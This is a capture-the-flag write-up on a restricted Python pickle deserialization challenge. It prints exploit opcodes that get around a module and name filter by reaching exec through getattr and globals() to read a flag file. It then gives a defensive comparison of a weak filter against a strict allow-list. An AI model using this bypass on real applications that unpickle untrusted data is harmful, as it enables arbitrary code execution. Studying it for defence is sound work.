Python pickle deserialization vulnerability


The flag is located in ./flag.txt.


Pickle is used to save and load notes into the application.

Normally, we would be able to use the __reduce__() method to make the program call functions like os.system() (see

See The modules we can unpickle are restricted to __main__, __builtin__ and copyreg. eval and exec are also banned.

Thanks to, I found a way to bypass the restrictions.

They created an API to generate Pickle opcodes: (I made some slight modifications)

Exploit code:

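# Only names from the allowed __builtin__ module are loaded by reference
getattr = GLOBAL('__builtin__', 'getattr')
dict = GLOBAL('__builtin__', 'dict')
dict_get = getattr(dict, 'get')
# Call globals() during unpickling and read its '__builtins__' entry
glo_dic = GLOBAL('__builtin__', 'globals')()
builtins = dict_get(glo_dic, '__builtins__')
# exec is fetched as an attribute, not as a global lookup
exec = getattr(builtins, 'exec')
exec("print(open('flag.txt', 'r').read())")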

The idea is that getattr lets us reach attributes of the objects in __builtin__ (and attributes of those attributes), even though exec itself is banned from being loaded directly. The dictionary returned by __builtin__.globals() contains __builtins__, which in turn contains exec. Once we have control over exec, we can execute arbitrary code.
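From the defender's side, the weakness is the policy shape: allowing whole modules and banning a few names still hands out getattr and globals. The sketch below is an added example, not the challenge's code or the API author's; it assumes Python 3 (where __builtin__ is called builtins), and the class names and the strict allow-list contents are hypothetical. It compares that module-level filter with an exact (module, name) allow-list.

```python
import builtins
import io
import pickle

# Policy described in the write-up: allow whole modules, ban two names.
WEAK_MODULES = {"__main__", "builtins", "copyreg"}  # builtins == Python 2 __builtin__
WEAK_BANNED = {"eval", "exec"}

# Hypothetical strict policy: only the exact globals that stored notes may need.
STRICT_ALLOWED = {("builtins", "set"), ("builtins", "frozenset")}


class WeakUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module in WEAK_MODULES and name not in WEAK_BANNED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked {module}.{name}")


class StrictUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in STRICT_ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked {module}.{name}")


def loads(unpickler_cls, data):
    """Deserialize data with the given restricted unpickler class."""
    return unpickler_cls(io.BytesIO(data)).load()


def is_blocked(unpickler_cls, data):
    """True if the unpickler refuses the pickle, False if it loads."""
    try:
        loads(unpickler_cls, data)
    except pickle.UnpicklingError:
        return True
    return False


# Constructed samples: pickling a builtin stores only a by-name reference to it,
# so each sample exercises exactly one find_class() lookup and runs nothing.
SAMPLES = {n: pickle.dumps(getattr(builtins, n))
           for n in ("getattr", "globals", "dict", "exec")}
# Constructed benign note: plain containers need no global lookup at all.
NOTE = pickle.dumps({"title": "todo", "tags": {"a", "b"}})
```

The weak filter stops only the direct reference to exec, while the strict one refuses every sample and still loads the plain note.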

Submit the base64-encoded opcodes, and we obtain the flag.

